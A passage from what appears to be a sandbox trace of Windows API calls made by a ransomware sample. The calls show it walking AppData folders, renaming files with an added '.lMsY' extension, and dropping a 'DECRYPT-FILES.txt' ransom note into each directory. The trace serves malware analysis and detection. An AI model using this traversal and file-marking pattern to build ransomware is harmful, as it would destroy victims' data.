param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.lMsY") returned 73 [0088.092] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.lMsY" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat.lmsy"), dwFlags=0x0) returned 1 [0088.092] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.093] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.093] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.093] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b25da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0088.093] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0088.093] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\jkbimi8.tmp" [0088.093] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.094] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.094] CloseHandle (hObject=0x0) returned 0 [0088.094] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.094] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b25da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.094] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.094] CloseHandle (hObject=0x440) returned 1 [0088.094] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b25da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.094] lstrcatW (in: lpString1="IECompatCache", lpString2="\\" | out: lpString1="IECompatCache\\") returned="IECompatCache\\" [0088.094] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IECompatCache\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" [0088.094] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\jkbimi8.tmp") returned 77 [0088.094] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.095] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 65 [0088.095] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.095] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\DECRYPT-FILES.txt") returned 83 [0088.095] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.096] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.097] CloseHandle (hObject=0x444) returned 1 [0088.097] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 65 [0088.097] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*" [0088.097] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.097] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.097] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.097] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.097] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b4bf00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.097] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" [0088.097] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\jkbimi8.tmp" [0088.097] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.098] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.098] CloseHandle (hObject=0x0) returned 0 [0088.098] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.098] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0088.098] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0088.098] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0088.098] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0088.098] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="Low\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" [0088.098] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\jkbimi8.tmp") returned 81 [0088.098] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0088.098] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 69 [0088.099] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.099] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\DECRYPT-FILES.txt") returned 87 [0088.099] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.099] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.100] CloseHandle (hObject=0x44c) returned 1 [0088.100] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 69 [0088.100] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*" [0088.100] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.100] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.100] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.101] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.101] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.101] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b4bf00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.101] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" [0088.101] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\jkbimi8.tmp" [0088.101] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.101] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.101] CloseHandle (hObject=0x0) returned 0 [0088.101] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.101] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b4bf00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.101] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.101] CloseHandle (hObject=0x448) returned 1 [0088.102] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0088.102] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.102] CloseHandle (hObject=0x440) returned 1 [0088.102] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0088.102] lstrcmpW (lpString1="IETldCache", lpString2=".") returned 1 [0088.102] lstrcmpW (lpString1="IETldCache", lpString2="..") returned 1 [0088.102] lstrcatW (in: lpString1="IETldCache", lpString2="\\" | out: lpString1="IETldCache\\") returned="IETldCache\\" [0088.102] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IETldCache\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\" [0088.102] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\" [0088.102] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\jkbimi8.tmp" [0088.102] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.102] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.102] CloseHandle (hObject=0x0) returned 0 [0088.102] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.103] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0088.103] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0088.103] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0088.103] lstrcatW (in: lpString1="Libraries", lpString2="\\" | out: lpString1="Libraries\\") returned="Libraries\\" [0088.103] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0088.103] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\jkbimi8.tmp") returned 73 [0088.103] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.106] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0088.106] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.106] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\DECRYPT-FILES.txt") returned 79 [0088.106] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.107] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.108] CloseHandle (hObject=0x444) returned 1 [0088.108] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0088.108] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0088.108] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b72060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b72060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.108] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.108] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b72060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b72060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.108] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.108] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.108] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b72060, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b72060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b72060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.108] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0088.108] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Documents.library-ms" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" [0088.108] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.108] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.109] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3587) 